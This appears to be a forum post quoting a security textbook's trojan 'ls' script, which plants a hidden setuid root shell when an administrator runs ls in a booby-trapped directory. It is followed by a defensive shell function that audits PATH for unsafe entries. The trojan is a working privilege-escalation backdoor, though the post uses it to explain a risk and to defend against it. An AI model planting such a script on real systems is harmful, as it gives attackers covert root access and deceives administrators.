Practical Unix and Internet Security, page 88, discusses a scenario where the author needed to get the root password of someone who had allowed him root access on that PC but declined to give him the root password for some reason.

He writes:
"First we create an executable shell file ls in the current directory:

#!/bin/sh
cp /bin/sh ./stuff/junk/.superdude
chmod 4555 ./stuff/junk/.superdude
rm -f $0
exec /bin/ls ${1+"$@"}
"

.superdude is supposed to be root.
Then he tricks the administrator into su-ing to root, changing into the current directory and executing the ls command; the fake ls file in the current directory is executed because it is in the current directory.
Anyway, I was just wondering: if he had root access to that PC, did he really need to do that? After all, it is just a trick. I have heard that there is some way (not a password cracker) to get (or change) the Unix password, provided that you have access to the system as root but don't know the root password.
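
The quoted script only runs if the shell finds a file named ls in the current directory before /bin/ls, which happens when the search path includes the current directory. As an added example (not from the book or from this post), here is a POSIX shell check for such PATH entries. audit_path is a hypothetical helper name, the sample PATH is constructed, and the world-writable directory check goes beyond the scenario in the text.

```shell
#!/bin/sh
# Added example: audit a PATH value for entries that let a file planted in the
# current directory (or by any user) shadow a system command such as ls.
# audit_path is a hypothetical helper name, not part of any standard tool.
# Prints one finding per risky entry; returns 1 if any were found, else 0.
audit_path() {
    rest="$1:"      # trailing ':' terminates every entry, including empty ones
    findings=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}   # text before the first ':'
        rest=${rest#*:}     # text after the first ':'
        case "$entry" in
            "") echo "empty entry (searched as the current directory)" ;;
            .)  echo "'.' entry (the current directory)" ;;
            /*) # absolute path: flag it only if any user may create files in it
                case "$(ls -ldL "$entry" 2>/dev/null)" in
                    d???????w*) echo "world-writable directory: $entry" ;;
                    *) continue ;;   # absolute and not world-writable: fine
                esac ;;
            *)  echo "relative entry (resolved against the current directory): $entry" ;;
        esac
        findings=$((findings + 1))
    done
    [ "$findings" -eq 0 ]
}

# Constructed sample PATH: the '.' entry is what lets ./ls run instead of /bin/ls.
audit_path "/usr/local/bin:.:/usr/bin:/bin" || true
```

Run it as root against "$PATH" (and against the PATH set in root's shell startup files) to see whether a command typed in an untrusted directory could resolve to a local file.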